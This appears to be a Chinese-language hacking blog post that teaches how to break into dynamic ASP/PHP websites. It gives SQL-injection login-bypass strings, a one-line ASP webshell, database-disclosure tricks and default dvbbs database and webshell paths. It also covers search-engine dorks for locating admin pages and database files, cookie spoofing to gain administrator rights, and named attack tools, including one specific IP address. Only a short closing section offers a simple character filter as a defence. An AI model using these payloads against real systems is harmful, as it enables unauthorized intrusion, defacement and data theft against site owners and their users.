網站入侵邏輯思維

一個網站首先要看的地方是他的網站類型,只有觀察好網站類型妳才能更好的應對也才能更好的找到針對的方案。

什麽樣站點可以入侵:我認為必須是動態的網站 如ASP、PHP、 JSP等代碼編寫的站點 如果是靜態的(.htm或html),一般是不會成功的。

如果要入侵的目標網站是動態的,就可以利用動態網站的漏洞進行入侵。

以下是入侵網站常用方法:

1.上載漏洞

如果看到:選擇妳要上載的文件 [重新上載]或者出現“請登陸後使用”,80%就有漏洞了!

有時上載不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上載. 

2.註入漏洞

字符過濾不嚴造成的

3.暴庫:把二級目錄中間的/換成%5c 

4.’or’=’or’這是一個可以連接SQL的語名句.可以直接進入後臺。

我收集了一下。類似的還有:

 ’or”=’

 ” or “a”=”a  

‘) or (‘a’=’a  

“) or (“a”=”a  

or 1=1– 

‘ or ‘a’=’a

以上的幾種都屬於常規手段,也就是網路上的攻擊,還有一種搜集情報類的攻擊手段我就不詳細寫了,就是我們的社會專案學。不過搜集情報什麽的可是一個辛苦的工作啊.

5.寫入ASP格式數據庫。就是一句話木馬〈%execute request(“value”)%〉 (數據庫必需得是ASP或ASA的字尾)

6.源碼利用:一些網站用的都是網上下載的源碼.有的站長很懶.什麽也不改.

比如:預設數據庫,預設後臺地址,預設管理員帳號密碼等

7.預設數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.

/Databackup/dvbbs7.MDB

/bbs/Databackup/dvbbs7.MDB

/bbs/Data/dvbbs7.MDB

/data/dvbbs7.mdb

/bbs/diy.asp

/diy.asp

/bbs/cmd.asp

/bbs/cmd.exe

/bbs/s-u.exe

/bbs/servu.exe

工具:網站獵手 挖掘雞 明小子

8.檢視目錄法:一些網站可以斷開目錄,可以訪問目錄。

210.37.95.65 images

9.搜索引擎利用:

inurl:flasher_list.asp 

預設數據庫:database/flash.mdb 

後臺/manager/

找網站的管理後臺地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理  〈關鍵字很多,自已找〉

site:xxxx.cominurl:login

查找access的數據庫,mssql、mysql的連接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

10.COOKIE詐欺:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改

COOKIE。

11.利用常見的漏洞:如動網BBS

可以先用:dvbbs權限提升工具,使自已成為前臺管理員。

THEN,運用:動網固頂貼工具,找個固頂貼,再取得COOKIES,這個要妳自已做。我們可以用

WSockExpert取得Cookies/NC包

這個我就不做了,網上教程多的是,自已下個看看。

工具:dvbbs權限提升工具  動網固頂貼工具

12.還有一些老漏洞。如IIS3,4的檢視源碼,

5的Delete CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什麽大用途。

這裏再介紹一種方式就是簡單的腳本入侵,腳本入侵也是一種耗腦子的騷操作啊

簡單的腳本攻擊 此類攻擊是由於WEB程式編寫上對特殊字符過濾不嚴密所造成的,雖說不能對服務器的安全

造成嚴重威脅,可是卻可以使入侵者PO含有HTML語句的惡意代碼,擾亂網站秩序,從而對網站

產生不良影響。下面給大家舉個例子:某網站在進行用戶註冊時,沒有對特殊字符進行過濾,就

有可能被無聊者利用,假設論壇的管理員ID為:webmaster,那就有可能有人在註冊用戶名時註冊

成 webmaster ,盡管ID有區別,可是在頁面顯示卻是一樣的,如果無聊者把其他的信息改的和

webmaster一樣,那別人就很難區分這兩個ID哪個是真的哪個是假的。有不少網站有自己開發的

留言闆,而且支援提交HTML留言,這就給破壞者提供了機會,他們可以寫一個自動彈出視窗併打

開一個帶木馬的網頁的代碼,這樣別人在瀏覽這條留言時就有可能被種下木馬。防範方法很簡單,加個過濾函數就可以了:

〈%

  function SqlCheck(fString)

   fString = Replace(fString, “‘”,””)

   fString = Replace(fString, ” “,””)

   fString = Replace(fString, “;”,””)

   fString = Replace(fString, “–“,””)

   fString = Replace(fString, “,”,””)

   fString = Replace(fString, “(“,””)

   fString = Replace(fString, “)”,””)

   fString = Replace(fString, “=”,””)

   fString = Replace(fString, “%”,””)

   fString = Replace(fString, “*”,””)

   fString = Replace(fString, “<“,””)

   fString = Replace(fString, “>”,””)

   SqlCheck = fString

  end function

%〉

以上過濾函數中的String = Replace(fString, “<“,””) fString = Replace(fString,

“>”,””)可以去掉語句中的“<”和“>”符號,使HTML代碼無法運行。  

創作者介紹
創作者 Hacks Pulse的部落格 的頭像
Hacks Pulse

Hacks Pulse的部落格

Hacks Pulse 發表在 痞客邦 留言(0) 人氣( 0 )